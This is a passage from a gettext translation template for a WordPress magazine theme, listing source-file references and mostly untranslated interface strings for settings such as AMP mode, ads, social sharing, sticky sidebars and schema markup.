backend/category-settings.php:499 msgid "Default from Category Settings" msgstr "" #: backend/panels/amp.php:187 backend/panels/amp.php:196 #: backend/panels/amp.php:205 backend/panels/amp.php:223 #: backend/panels/amp.php:232 msgid "Default from Single Settings" msgstr "" #: backend/panels/heading.php:97 msgid "Default layout is based on the \"Global Heading Layout\" setting." msgstr "" #: backend/panels/logo.php:30 msgid "Default Logos" msgstr "" #: backend/panels/single-post.php:1187 msgid "Default Review Image" msgstr "" #: backend/panels/single-post.php:1164 msgid "Default Review Type" msgstr "" #: backend/panels/typography.php:1111 msgid "Default Widgets" msgstr "" #: backend/panels/design.php:327 msgid "Define Custom Crop Sizes" msgstr "" #: backend/panels/ads.php:494 backend/panels/newsletter.php:111 msgid "Delay Time" msgstr "" #: backend/panels/adblock.php:33 backend/panels/blog-pages.php:2411 #: backend/panels/newsletter.php:41 #: woocommerce/single-product/tabs/description.php:24 msgid "Description" msgstr "" #: backend/panels/bookmark.php:120 backend/panels/bookmark.php:463 msgid "Description Image" msgstr "" #: backend/category-settings.php:441 backend/panels/blog-pages.php:468 #: backend/panels/blog-pages.php:955 backend/panels/blog-pages.php:1369 #: backend/panels/blog-pages.php:1777 backend/panels/blog-pages.php:2269 #: backend/panels/bookmark.php:367 backend/panels/bookmark.php:815 msgid "Desktop - Title Font Size" msgstr "" #: backend/panels/header.php:277 msgid "Destination Link" msgstr "" #: backend/panels/adblock.php:14 msgid "" "Detecting most of the AdBlock extensions and show a popup to disable the " "extension." msgstr "" #: templates/parts.php:627 msgid "Digg" msgstr "" #: backend/panels/socials.php:104 msgid "Digg URL" msgstr "" #: backend/panels/single-post.php:1139 backend/single-metaboxes.php:648 msgid "Directly Redirect" msgstr "" #: backend/single-metaboxes.php:649 msgid "" "Directly redirect to the sponsor website when clicking on the post listing " "title." msgstr "" #: backend/panels/single-post.php:1140 msgid "" "Directly redirect to the sponsored URL when visitors click on the post title " "in the blog listing." msgstr "" #: backend/category-settings.php:106 backend/category-settings.php:118 #: backend/category-settings.php:317 backend/category-settings.php:350 #: backend/category-settings.php:473 backend/category-settings.php:503 #: backend/configs.php:197 backend/configs.php:297 backend/configs.php:303 #: backend/configs.php:337 backend/configs.php:343 backend/configs.php:358 #: backend/configs.php:381 backend/configs.php:387 backend/configs.php:427 #: backend/configs.php:433 backend/configs.php:587 #: backend/panels/blog-pages.php:326 backend/panels/blog-pages.php:497 #: backend/panels/blog-pages.php:527 backend/panels/blog-pages.php:813 #: backend/panels/blog-pages.php:984 backend/panels/blog-pages.php:1014 #: backend/panels/blog-pages.php:1227 backend/panels/blog-pages.php:1398 #: backend/panels/blog-pages.php:1428 backend/panels/blog-pages.php:1635 #: backend/panels/blog-pages.php:1806 backend/panels/blog-pages.php:1836 #: backend/panels/blog-pages.php:2127 backend/panels/blog-pages.php:2298 #: backend/panels/blog-pages.php:2328 backend/panels/bookmark.php:229 #: backend/panels/bookmark.php:396 backend/panels/bookmark.php:415 #: backend/panels/bookmark.php:677 backend/panels/bookmark.php:844 #: backend/panels/bookmark.php:871 backend/panels/breadcrumb.php:55 #: backend/panels/breadcrumb.php:66 backend/panels/breadcrumb.php:77 #: backend/panels/breadcrumb.php:88 backend/panels/breadcrumb.php:99 #: backend/panels/footer.php:99 backend/panels/page.php:87 #: backend/panels/single-post.php:239 backend/panels/single-post.php:454 #: backend/panels/single-post.php:1181 backend/panels/single-post.php:1223 #: backend/single-metaboxes.php:147 backend/single-metaboxes.php:159 #: backend/single-metaboxes.php:362 backend/single-metaboxes.php:410 #: backend/single-metaboxes.php:488 backend/single-metaboxes.php:653 #: backend/single-metaboxes.php:686 backend/single-metaboxes.php:697 #: backend/single-metaboxes.php:716 backend/single-metaboxes.php:826 #: backend/single-metaboxes.php:845 backend/single-metaboxes.php:864 #: backend/single-metaboxes.php:875 backend/single-metaboxes.php:924 #: backend/single-metaboxes.php:936 msgid "Disable" msgstr "" #: backend/panels/login.php:119 backend/panels/login.php:146 msgid "Disable Admin Bar" msgstr "" #: backend/panels/login.php:120 backend/panels/login.php:147 msgid "Disable admin bar for all users except for Administrators" msgstr "" #: backend/panels/single-post.php:1232 msgid "Disable All Comments" msgstr "" #: backend/panels/ads.php:60 msgid "" "Disable auto Adsense on Woocommerce such as shop, product, cart, checkout...." msgstr "" #: backend/panels/amp.php:216 msgid "Disable comment form on AMP site." msgstr "" #: backend/panels/optimized.php:43 msgid "Disable Dashicons" msgstr "" #: backend/panels/optimized.php:81 msgid "Disable Default Fonts" msgstr "" #: backend/panels/optimized.php:51 msgid "Disable Gutenberg Style on Page Builder" msgstr "" #: backend/panels/login.php:126 backend/panels/login.php:153 msgid "Disable Language Bar" msgstr "" #: backend/panels/amp.php:188 backend/panels/amp.php:197 #: backend/panels/amp.php:206 backend/panels/amp.php:215 #: backend/panels/amp.php:224 backend/panels/amp.php:233 msgid "Disable on AMP" msgstr "" #: backend/panels/ads.php:59 msgid "Disable on Woocommerce Pages" msgstr "" #: backend/panels/blog-pages.php:83 msgid "Disable or select a category header style for the category pages." msgstr "" #: backend/category-settings.php:79 msgid "Disable or select a category header style for this category page." msgstr "" #: backend/category-settings.php:366 backend/panels/block-classic.php:59 #: backend/panels/block-grid.php:59 backend/panels/block-grid.php:224 #: backend/panels/block-grid.php:389 backend/panels/block-grid.php:562 #: backend/panels/block-grid.php:749 backend/panels/block-list.php:67 #: backend/panels/block-list.php:240 backend/panels/block-list.php:421 #: backend/panels/block-list.php:616 backend/panels/blog-pages.php:393 #: backend/panels/blog-pages.php:880 backend/panels/blog-pages.php:1294 #: backend/panels/blog-pages.php:1702 backend/panels/blog-pages.php:2194 #: backend/panels/bookmark.php:292 backend/panels/bookmark.php:740 msgid "Disable or select setting for entry review meta." msgstr "" #: backend/category-settings.php:382 backend/panels/block-classic.php:74 #: backend/panels/block-grid.php:74 backend/panels/block-grid.php:239 #: backend/panels/block-grid.php:404 backend/panels/block-grid.php:577 #: backend/panels/block-grid.php:764 backend/panels/block-list.php:82 #: backend/panels/block-list.php:255 backend/panels/block-list.php:436 #: backend/panels/block-list.php:631 backend/panels/blog-pages.php:409 #: backend/panels/blog-pages.php:896 backend/panels/blog-pages.php:1310 #: backend/panels/blog-pages.php:1718 backend/panels/blog-pages.php:2210 #: backend/panels/bookmark.php:308 backend/panels/bookmark.php:756 msgid "Disable or select setting for the post format." msgstr "" #: backend/panels/blog-pages.php:425 backend/panels/blog-pages.php:912 #: backend/panels/blog-pages.php:1326 backend/panels/blog-pages.php:1734 #: backend/panels/blog-pages.php:2226 backend/panels/bookmark.php:324 #: backend/panels/bookmark.php:772 msgid "Disable or select settings for the post excerpt." msgstr "" #: backend/panels/optimized.php:59 msgid "Disable Polyfill Script" msgstr "" #: backend/panels/design.php:673 msgid "Disable round corner style for whole the website." msgstr "" #: backend/panels/optimized.php:35 msgid "Disable Srcset" msgstr "" #: backend/panels/optimized.php:36 msgid "Disable Srcset to optimize page speed score on mobile device." msgstr "" #: backend/panels/amp.php:189 backend/panels/amp.php:198 msgid "Disable the Author Card in the AMP mode." msgstr "" #: backend/panels/optimized.php:52 msgid "Disable the block style css on the page built with Page Builder." msgstr "" #: backend/panels/login.php:127 backend/panels/login.php:154 msgid "Disable the language bar in the login screen." msgstr "" #: backend/panels/amp.php:207 msgid "Disable the Next/Prev Articles section in the AMP mode." msgstr "" #: backend/panels/amp.php:225 msgid "Disable the related section in the AMP mode." msgstr "" #: backend/panels/amp.php:234 msgid "Disable the single post sidebar section in the AMP mode." msgstr "" #: backend/single-metaboxes.php:143 msgid "Disable the top ad site for this page." msgstr "" #: backend/panels/optimized.php:60 msgid "" "Disable wp-polyfill script (supporting older browsers that do not understand " "ES6) to improve the page speed score." msgstr "" #: backend/panels/single-post.php:1371 msgid "Disabled" msgstr "" #: backend/single-metaboxes.php:568 msgid "disadvantage item" msgstr "" #: backend/single-metaboxes.php:560 msgid "Disadvantages" msgstr "" #: backend/class-tgm-plugin-activation.php:407 msgid "Dismiss this notice" msgstr "" #: backend/mega-menu.php:235 msgid "" "Display a icon before this menu item label. You can choose font icon or " "custom attachment image/SVG." msgstr "" #: backend/mega-menu.php:211 msgid "Display a sub label after this navigation label." msgstr "" #: backend/panels/design.php:185 msgid "Display Human Time (Ago)" msgstr "" #: backend/panels/newsletter.php:93 msgid "Display Mode" msgstr "" #: backend/single-metaboxes.php:745 msgid "" "Display page selected section when you use break pages for a lengthy content " "post." msgstr "" #: backend/panels/woocommerce.php:182 msgid "Display Percentage saved on WooCommerce sale products" msgstr "" #: backend/panels/single-post.php:1275 backend/panels/table-contents.php:141 #: backend/single-metaboxes.php:736 msgid "Display Position" msgstr "" #: backend/panels/ads.php:428 backend/panels/amp.php:588 msgid "Display Positions" msgstr "" #: backend/mega-menu.php:121 msgid "Display posts of this category." msgstr "" #: backend/panels/design.php:206 msgid "Display the edit post link for the logged users on the featured image." msgstr "" #: backend/panels/single-post.php:1738 msgid "Display the reading indicator bar at the top site." msgstr "" #: includes/sidebars.php:80 msgid "Display widget ad at the bottom of the website header." msgstr "" #: backend/panels/newsletter.php:104 msgid "Distance of Scroll" msgstr "" #: backend/panels/ads.php:134 backend/panels/ads.php:323 msgid "Do not Override" msgstr "" #: backend/panels/ads.php:45 msgid "Do not place more than one auto ads code in the website." msgstr "" #: templates/parts.php:630 msgid "Dribbble" msgstr "" #: backend/panels/socials.php:110 msgid "Dribbble URL" msgstr "" #: templates/parts.php:175 #, php-format msgid "Dynamic %s pagination" msgstr "" #: backend/panels/amp.php:181 msgid "" "Each AMP page has a 75,000 byte CSS limit, turn off unnecessary section will " "increase the AMP performance." msgstr "" #: backend/panels/amp.php:50 msgid "" "Each AMP page has a 75,000 byte CSS limit. Foxiz will support a compact " "footer to ensure your website will meet with this requirement." msgstr "" #: backend/panels/header.php:128 msgid "" "Each widget is added in \"Appearance >Widgets > More Menu Section\" will be " "corresponding to a column." msgstr "" #: templates/single/templates.php:970 msgid "Edit" msgstr "Editar" #: templates/entry.php:828 msgid "edit" msgstr "editar" #: backend/panels/design.php:205 msgid "Edit Link" msgstr "" #: templates/parts.php:120 msgid "Edit Page" msgstr "" #: backend/panels/design.php:200 backend/panels/design.php:337 msgid "Edit Post Link" msgstr "" #: backend/install-plugins.php:30 msgid "Elementor Website Builder" msgstr "" #: backend/panels/woocommerce.php:172 msgid "Elements Styling" msgstr "" #: backend/panels/optimized.php:195 backend/panels/single-post.php:804 #: backend/panels/single-post.php:943 backend/panels/single-post.php:1081 #: backend/panels/single-post.php:1705 msgid "Email" msgstr "" #: backend/panels/reaction.php:52 msgid "Embarrass" msgstr "" #: backend/category-settings.php:117 backend/category-settings.php:316 #: backend/configs.php:196 backend/configs.php:425 backend/mega-menu.php:131 #: backend/panels/blog-pages.php:325 backend/panels/blog-pages.php:812 #: backend/panels/blog-pages.php:1226 backend/panels/blog-pages.php:1634 #: backend/panels/blog-pages.php:2126 backend/panels/bookmark.php:228 #: backend/panels/bookmark.php:676 backend/panels/login.php:30 #: backend/panels/page.php:86 backend/panels/single-post.php:238 #: backend/panels/single-post.php:453 backend/panels/single-post.php:1179 #: backend/single-metaboxes.php:158 backend/single-metaboxes.php:361 #: backend/single-metaboxes.php:409 backend/single-metaboxes.php:477 #: backend/single-metaboxes.php:616 backend/single-metaboxes.php:654 #: backend/single-metaboxes.php:685 backend/single-metaboxes.php:696 #: backend/single-metaboxes.php:715 backend/single-metaboxes.php:825 #: backend/single-metaboxes.php:844 backend/single-metaboxes.php:863 #: backend/single-metaboxes.php:876 backend/single-metaboxes.php:935 msgid "Enable" msgstr "" #: backend/panels/single-post.php:1225 msgid "Enable for All Posts" msgstr "" #: backend/panels/single-post.php:1224 msgid "Enable for Review Posts" msgstr "" #: backend/panels/header.php:216 msgid "Enable live search result when typing." msgstr "" #: backend/single-metaboxes.php:821 msgid "" "Enable or disable ajax load next posts for this post. This setting will " "override on the global setting." msgstr "" #: backend/panels/single-post.php:1434 msgid "" "Enable or disable ajax load next posts when visitors reached end of the post " "content." msgstr "" #: backend/single-metaboxes.php:405 msgid "Enable or disable autoplay audio for this post." msgstr "" #: backend/panels/design.php:427 msgid "Enable or disable autoplay for the sliders." msgstr "" #: backend/single-metaboxes.php:357 msgid "Enable or disable autoplay video for this post." msgstr "" #: backend/panels/single-post.php:715 backend/panels/single-post.php:854 #: backend/panels/single-post.php:992 backend/panels/single-post.php:1613 msgid "Enable or disable color for social icons." msgstr "" #: backend/panels/single-post.php:480 msgid "Enable or disable entry category info in the single post." msgstr "" #: backend/panels/design.php:454 msgid "Enable or disable free mode when scrolling on the carousels." msgstr "" #: backend/panels/design.php:648 msgid "Enable or disable GIF supported for your website." msgstr "" #: backend/panels/table-contents.php:149 msgid "Enable or disable hierarchy for the table of contents box." msgstr "" #: backend/panels/design.php:492 msgid "Enable or disable icon for the audio post format." msgstr "" #: backend/panels/design.php:485 msgid "Enable or disable icon for the gallery post format." msgstr "" #: backend/panels/design.php:478 msgid "Enable or disable icon for the video post format." msgstr "" #: backend/panels/optimized.php:237 msgid "" "Enable or disable Open Graph (share to social). This option will be " "automatically disabled if you use Yoast SEO." msgstr "" #: backend/panels/optimized.php:75 msgid "Enable or disable preload font icons to increase the site speed score." msgstr "" #: backend/panels/optimized.php:68 msgid "" "Enable or disable preload Google fonts to increase the site speed score." msgstr "" #: backend/panels/single-post.php:276 msgid "" "Enable or disable quick view info bar (review & sponsor meta) at the top of " "the content." msgstr "" #: backend/single-metaboxes.php:871 msgid "" "Enable or disable review markup for this review. This option is useful in " "case you are using 3rd party markup plugin." msgstr "" #: backend/panels/optimized.php:161 msgid "" "Enable or disable review product markup for single post page if you want to " "use 3rd party plugin." msgstr "" #: backend/panels/optimized.php:122 msgid "" "Enable or disable schema markup for the website, helps generate brand " "signals. Disable this option if you want to use 3rd party plugin." msgstr "" #: backend/single-metaboxes.php:859 msgid "" "Enable or disable Schema markup for this article. Disable default schema " "markup for this post if you use a 3rd plugin to create another post type for " "example Recipe, Videos." msgstr "" #: backend/panels/header.php:238 msgid "Enable or disable search icon in the mobile header." msgstr "" #: backend/panels/header.php:245 msgid "Enable or disable search icon the AMP header." msgstr "" #: backend/panels/single-post.php:805 backend/panels/single-post.php:944 #: backend/panels/single-post.php:1082 backend/panels/single-post.php:1706 msgid "Enable or disable share on Email." msgstr "" #: backend/panels/single-post.php:724 backend/panels/single-post.php:863 #: backend/panels/single-post.php:1001 backend/panels/single-post.php:1508 #: backend/panels/single-post.php:1634 msgid "Enable or disable share on Facebook." msgstr "" #: backend/panels/single-post.php:760 backend/panels/single-post.php:899 #: backend/panels/single-post.php:1037 backend/panels/single-post.php:1666 msgid "Enable or disable share on LinkedIn." msgstr "" #: backend/panels/single-post.php:742 backend/panels/single-post.php:881 #: backend/panels/single-post.php:1019 backend/panels/single-post.php:1650 msgid "Enable or disable share on Pinterest." msgstr "" #: backend/panels/single-post.php:778 backend/panels/single-post.php:917 #: backend/panels/single-post.php:1055 backend/panels/single-post.php:1524 #: backend/panels/single-post.php:1682 msgid "Enable or disable share on Reddit." msgstr "" #: backend/panels/single-post.php:984 msgid "Enable or disable share on socials at the fixed left section." msgstr "" #: backend/panels/single-post.php:1605 msgid "Enable or disable share on socials list in this bar." msgstr "" #: backend/panels/single-post.php:796 backend/panels/single-post.php:935 #: backend/panels/single-post.php:1073 backend/panels/single-post.php:1698 msgid "Enable or disable share on Telegram." msgstr "" #: backend/panels/single-post.php:769 backend/panels/single-post.php:908 #: backend/panels/single-post.php:1046 backend/panels/single-post.php:1674 msgid "Enable or disable share on Tumblr." msgstr "" #: backend/panels/single-post.php:733 backend/panels/single-post.php:872 #: backend/panels/single-post.php:1010 backend/panels/single-post.php:1516 #: backend/panels/single-post.php:1642 msgid "Enable or disable share on Twitter." msgstr "" #: backend/panels/single-post.php:787 backend/panels/single-post.php:926 #: backend/panels/single-post.php:1064 backend/panels/single-post.php:1690 msgid "Enable or disable share on Vkontakte." msgstr "" #: backend/panels/single-post.php:751 backend/panels/single-post.php:890 #: backend/panels/single-post.php:1028 backend/panels/single-post.php:1658 msgid "Enable or disable share on WhatsApp." msgstr "" #: backend/panels/table-contents.php:164 msgid "Enable or disable smooth scroll effect to jumb to the anchor link." msgstr "" #: backend/single-metaboxes.php:612 msgid "Enable or disable sponsored content for this post." msgstr "" #: backend/panels/page.php:83 msgid "Enable or disable sticky sidebar feature for the single page." msgstr "" #: backend/panels/single-post.php:450 msgid "" "Enable or disable sticky sidebar feature. This option will only apply to the " "single post." msgstr "" #: backend/panels/blog-pages.php:1631 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "archive pages." msgstr "" #: backend/panels/blog-pages.php:1223 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the author " "pages." msgstr "" #: backend/panels/blog-pages.php:809 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the blog " "page." msgstr "" #: backend/panels/blog-pages.php:322 backend/panels/bookmark.php:225 #: backend/panels/bookmark.php:673 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "category pages." msgstr "" #: backend/panels/blog-pages.php:2123 backend/panels/blog-pages.php:2343 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the search " "pages." msgstr "" #: backend/panels/single-post.php:1597 msgid "Enable or disable sticky the single post headline (post title)" msgstr "" #: backend/panels/block-classic.php:114 backend/panels/block-grid.php:114 #: backend/panels/block-grid.php:279 backend/panels/block-grid.php:444 #: backend/panels/block-grid.php:617 backend/panels/block-grid.php:804 #: backend/panels/block-list.php:122 backend/panels/block-list.php:295 #: backend/panels/block-list.php:476 backend/panels/block-list.php:671 msgid "Enable or disable the \"sponsored by\" meta." msgstr "" #: backend/panels/adblock.php:20 msgid "Enable or disable the adblock detector." msgstr "" #: backend/single-metaboxes.php:154 backend/single-metaboxes.php:931 msgid "Enable or disable the alert bar below the header." msgstr "" #: backend/panels/header.php:652 msgid "" "Enable or disable the alert bar below the header. This option will be " "overridden by the setting in individual post/page." msgstr "" #: backend/panels/single-post.php:577 msgid "Enable or disable the author avatars before the entry meta bar." msgstr "" #: backend/panels/blog-pages.php:1078 msgid "Enable or disable the author bio in the author pages." msgstr "" #: backend/panels/single-post.php:384 msgid "Enable or disable the author information in the bottom of the content." msgstr "" #: backend/panels/single-post.php:601 msgid "Enable or disable the author job info." msgstr "" #: backend/panels/amp.php:152 backend/panels/general.php:26 msgid "Enable or disable the back to top button." msgstr "" #: backend/panels/bookmark.php:38 msgid "" "Enable or disable the bookmark feature. This is global option and will apply " "to whole the website." msgstr "" #: backend/category-settings.php:390 backend/panels/block-classic.php:82 #: backend/panels/block-grid.php:82 backend/panels/block-grid.php:247 #: backend/panels/block-grid.php:412 backend/panels/block-grid.php:585 #: backend/panels/block-grid.php:772 backend/panels/block-list.php:90 #: backend/panels/block-list.php:263 backend/panels/block-list.php:444 #: backend/panels/block-list.php:639 backend/panels/blog-pages.php:417 #: backend/panels/blog-pages.php:904 backend/panels/blog-pages.php:1318 #: backend/panels/blog-pages.php:1726 backend/panels/blog-pages.php:2218 #: backend/panels/bookmark.php:316 backend/panels/bookmark.php:764 msgid "Enable or disable the bookmark icon." msgstr "" #: backend/single-metaboxes.php:693 msgid "Enable or disable the bottom entry widgets for this post." msgstr "" #: backend/panels/single-post.php:846 msgid "" "Enable or disable the bottom share bar, This section is displayed at below " "of the post content." msgstr "" #: backend/panels/breadcrumb.php:31 msgid "Enable or disable the breadcrumb bar for your website." msgstr "" #: backend/panels/breadcrumb.php:62 msgid "Enable or disable the breadcrumb bar in the single page." msgstr "" #: backend/panels/breadcrumb.php:51 msgid "Enable or disable the breadcrumb bar in the single post." msgstr "" #: backend/panels/breadcrumb.php:95 msgid "Enable or disable the breadcrumb in the archive pages." msgstr "" #: backend/panels/breadcrumb.php:84 msgid "Enable or disable the breadcrumb in the author pages." msgstr "" #: backend/panels/breadcrumb.php:73 msgid "Enable or disable the breadcrumb in the category pages." msgstr "" #: backend/category-settings.php:101 msgid "Enable or disable the breadcrumb in this category header." msgstr "" #: backend/panels/single-post.php:1213 msgid "" "Enable or disable the button show/hide comment box in the single post pages." msgstr "" #: backend/panels/single-post.php:1474 msgid "" "Enable or disable the button show/hide comment box when load next posts." msgstr "" #: backend/panels/single-post.php:953 msgid "Enable or disable the copy post link button." msgstr "" #: backend/panels/single-post.php:814 backend/panels/single-post.php:1091 msgid "Enable or disable the copy post link icon." msgstr "" #: backend/panels/dark-mode.php:29 msgid "Enable or disable the dark mode whole your website." msgstr "" #: backend/panels/optimized.php:153 msgid "" "Enable or disable the default schema markup for single post page if you want " "to use 3rd party plugin." msgstr "" #: backend/panels/amp.php:131 msgid "Enable or disable the footer copyright section." msgstr "" #: backend/panels/ads.php:463 msgid "Enable or disable the footer slide up section." msgstr "" #: backend/panels/single-post.php:1500 msgid "Enable or disable the highlight shares feature." msgstr "" #: backend/panels/design.php:186 msgid "" "Enable or disable the human time format (\"ago\") for the data post entry " "meta." msgstr "" #: backend/panels/single-post.php:639 msgid "Enable or disable the last updated meta info in the single post." msgstr "" #: backend/panels/optimized.php:28 msgid "Enable or disable the lazy load for the featured image." msgstr "" #: backend/category-settings.php:374 backend/panels/block-classic.php:67 #: backend/panels/block-grid.php:67 backend/panels/block-grid.php:232 #: backend/panels/block-grid.php:397 backend/panels/block-grid.php:570 #: backend/panels/block-grid.php:757 backend/panels/block-list.php:75 #: backend/panels/block-list.php:248 backend/panels/block-list.php:429 #: backend/panels/block-list.php:624 backend/panels/blog-pages.php:401 #: backend/panels/blog-pages.php:888 backend/panels/blog-pages.php:1302 #: backend/panels/blog-pages.php:1710 backend/panels/blog-pages.php:2202 #: backend/panels/bookmark.php:300 backend/panels/bookmark.php:748 msgid "Enable or disable the meta description at the end of the review bar." msgstr "" #: backend/panels/header-style.php:30 backend/panels/header-style.php:324 #: backend/panels/header-style.php:575 msgid "Enable or disable the more button at the end of the navigation." msgstr "" #: backend/panels/single-post.php:334 msgid "Enable or disable the newsletter form at bottom entry content." msgstr "" #: backend/panels/single-post.php:393 msgid "" "Enable or disable the next/previous link navigation in single post pages." msgstr "" #: backend/panels/header.php:270 msgid "Enable or disable the notification section on the header." msgstr "" #: backend/panels/table-contents.php:157 msgid "Enable or disable the number list items." msgstr "" #: backend/panels/single-post.php:1395 msgid "Enable or disable the popular section in single post pages." msgstr "" #: backend/panels/newsletter.php:28 msgid "Enable or disable the popup newsletter form." msgstr "" #: backend/panels/bookmark.php:45 msgid "" "Enable or disable the popup notification when users add or remove a post." msgstr "" #: backend/panels/single-post.php:297 msgid "Enable or disable the post tags bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:962 backend/panels/single-post.php:1100 #: backend/panels/single-post.php:1714 msgid "Enable or disable the print button." msgstr "" #: backend/panels/single-post.php:823 msgid "Enable or disable the print post button." msgstr "" #: backend/panels/privacy.php:15 msgid "Enable or disable the privacy bar." msgstr "" #: backend/panels/reaction.php:24 msgid "Enable or disable the reaction section at the end of single post pages." msgstr "" #: backend/single-metaboxes.php:840 msgid "Enable or disable the reaction section at the end of this post." msgstr "" #: backend/category-settings.php:426 backend/panels/block-classic.php:107 #: backend/panels/block-grid.php:107 backend/panels/block-grid.php:272 #: backend/panels/block-grid.php:437 backend/panels/block-grid.php:610 #: backend/panels/block-grid.php:797 backend/panels/block-list.php:115 #: backend/panels/block-list.php:288 backend/panels/block-list.php:469 #: backend/panels/block-list.php:664 backend/panels/blog-pages.php:454 #: backend/panels/blog-pages.php:941 backend/panels/blog-pages.php:1355 #: backend/panels/blog-pages.php:1763 backend/panels/blog-pages.php:2255 #: backend/panels/bookmark.php:353 backend/panels/bookmark.php:801 msgid "Enable or disable the read more button." msgstr "" #: backend/panels/single-post.php:1746 msgid "Enable or disable the reading indicator bar." msgstr "" #: backend/panels/single-post.php:668 msgid "Enable or disable the reading time info in the single post." msgstr "" #: backend/panels/single-post.php:1297 msgid "" "Enable or disable the related section at the footer in single post pages." msgstr "" #: backend/panels/woocommerce.php:138 msgid "enable or disable the review box in the single product page." msgstr "" #: backend/single-metaboxes.php:472 msgid "Enable or disable the review feature for this post." msgstr "" #: backend/panels/blog-pages.php:2419 msgid "Enable or disable the search form." msgstr "" #: backend/panels/header.php:196 msgid "Enable or disable the search icon in the header." msgstr "" #: backend/panels/header.php:533 msgid "Enable or disable the sign in button on the header." msgstr "" #: backend/panels/header.php:541 msgid "Enable or disable the sign in button on the mobile header." msgstr "" #: backend/panels/header-style.php:37 backend/panels/header-style.php:331 #: backend/panels/header-style.php:582 msgid "Enable or disable the social icons list at the end of the navigation." msgstr "" #: backend/panels/amp.php:104 backend/panels/footer.php:165 msgid "Enable or disable the social list in this section." msgstr "" #: backend/panels/header.php:374 msgid "Enable or disable the socials list." msgstr "" #: backend/panels/single-post.php:305 msgid "Enable or disable the sources bar at the bottom of the post content." msgstr "" #: backend/panels/header.php:83 msgid "Enable or disable the sticky feature for the main menu bar." msgstr "" #: backend/panels/blog-pages.php:99 msgid "Enable or disable the sub category list in the category header." msgstr "" #: backend/category-settings.php:113 msgid "Enable or disable the sub category list in this category header." msgstr "" #: backend/single-metaboxes.php:711 msgid "Enable or disable the table content for this post." msgstr "" #: backend/panels/table-contents.php:30 msgid "Enable or disable the table of content for the single post." msgstr "" #: backend/panels/table-contents.php:37 msgid "Enable or disable the table of content for the single." msgstr "" #: backend/single-metaboxes.php:920 msgid "Enable or disable the top ad site for this post." msgstr "" #: backend/single-metaboxes.php:682 msgid "Enable or disable the top entry widgets for this post." msgstr "" #: backend/panels/single-post.php:313 msgid "Enable or disable the via bar at the bottom of the post content." msgstr "" #: backend/panels/design.php:363 backend/panels/design.php:371 #: backend/panels/design.php:379 backend/panels/design.php:387 #: backend/panels/design.php:395 msgid "Enable or disable this image crop size." msgstr "" #: backend/panels/general.php:18 msgid "Enable or disable tooltips when hovering on icons." msgstr "" #: backend/panels/single-post.php:707 msgid "" "Enable or disable top share section. This section will display below the " "single entry meta info." msgstr "" #: backend/panels/single-post.php:1220 msgid "" "Enable or disable visitors can rate and review all posts in the comment box." msgstr "" #: backend/panels/single-post.php:1176 msgid "Enable or disable visitors can rate and review on the post review." msgstr "" #: backend/single-metaboxes.php:484 msgid "" "Enable or disable visitors can rate and review this post in the comment box." msgstr "" #: backend/panels/optimized.php:130 msgid "" "Enable or disable website markup, helps to show the Search Box feature for " "brand SERPs and can help your website name to appear in search results." msgstr "" #: backend/panels/sidebar.php:56 msgid "Enable or disable widget block editor (WordPress 5.8 or above)." msgstr "" #: backend/panels/login.php:26 msgid "Enable or disable wp-login.php page style." msgstr "" #: backend/panels/optimized.php:145 msgid "Enable the Carousels (Item List) schema markup for your Homepage." msgstr "" #: backend/panels/optimized.php:83 msgid "Enable this option if all fonts in Typography panels is set." msgstr "" #: backend/panels/single-post.php:489 msgid "" "Enable this option if you would like to only show the primary category in " "the single post." msgstr "" #: backend/panels/bookmark.php:51 backend/panels/table-contents.php:125 msgid "Enable When" msgstr "" #: backend/single-metaboxes.php:489 msgid "Enable with Review" msgstr "" #: backend/panels/single-post.php:1180 msgid "Enable without Post Review" msgstr "" #: backend/panels/header.php:205 msgid "" "Ensure the option \"More Menu - Search Form\" is enabled when you select the " "\"More Menu Triggered\" option." msgstr "" #: backend/panels/header.php:286 msgid "" "Ensure this section set to Light Text if you select a dark sub-menu " "background." msgstr "" #: backend/panels/header.php:327 msgid "" "Ensure you have also set \"Dark Mode Colors\" if you use custom colors for " "the default mode." msgstr "" #: backend/panels/block-classic.php:39 backend/panels/block-grid.php:39 #: backend/panels/block-grid.php:204 backend/panels/block-grid.php:369 #: backend/panels/block-grid.php:542 backend/panels/block-grid.php:729 #: backend/panels/block-list.php:47 backend/panels/block-list.php:220 #: backend/panels/block-list.php:401 backend/panels/block-list.php:596 #: backend/panels/blog-pages.php:364 backend/panels/blog-pages.php:851 #: backend/panels/blog-pages.php:1265 backend/panels/blog-pages.php:1673 #: backend/panels/blog-pages.php:2165 backend/panels/bookmark.php:264 #: backend/panels/bookmark.php:712 backend/panels/design.php:31 #: backend/panels/single-post.php:470 backend/panels/single-post.php:479 #: backend/panels/typography.php:415 msgid "Entry Category" msgstr "" #: backend/category-settings.php:25 msgid "Entry Category Colors" msgstr "" #: backend/panels/typography.php:423 msgid "Entry Category Font" msgstr "" #: backend/panels/single-post.php:497 msgid "Entry Category Font Size" msgstr "" #: backend/panels/typography.php:75 msgid "Entry Excerpt" msgstr "" #: backend/panels/design.php:89 backend/panels/single-post.php:560 #: backend/panels/typography.php:464 msgid "Entry Meta" msgstr "" #: backend/category-settings.php:345 backend/panels/blog-pages.php:374 #: backend/panels/blog-pages.php:861 backend/panels/blog-pages.php:1275 #: backend/panels/blog-pages.php:1683 backend/panels/blog-pages.php:2175 #: backend/panels/bookmark.php:273 backend/panels/bookmark.php:721 msgid "Entry Meta Bar" msgstr "" #: backend/panels/typography.php:472 msgid "Entry Meta Font" msgstr "" #: backend/panels/design.php:98 msgid "Entry Meta Icons" msgstr "" #: backend/panels/single-post.php:570 msgid "Entry Meta Settings" msgstr "" #: backend/category-settings.php:358 backend/panels/block-classic.php:49 #: backend/panels/block-grid.php:49 backend/panels/block-grid.php:214 #: backend/panels/block-grid.php:379 backend/panels/block-grid.php:552 #: backend/panels/block-grid.php:739 backend/panels/block-list.php:57 #: backend/panels/block-list.php:230 backend/panels/block-list.php:411 #: backend/panels/block-list.php:606 backend/panels/blog-pages.php:383 #: backend/panels/blog-pages.php:870 backend/panels/blog-pages.php:1284 #: backend/panels/blog-pages.php:1692 backend/panels/blog-pages.php:2184 #: backend/panels/bookmark.php:282 backend/panels/bookmark.php:730 #: backend/panels/single-post.php:585 msgid "Entry Meta Tags" msgstr "" #: backend/single-metaboxes.php:676 msgid "Entry 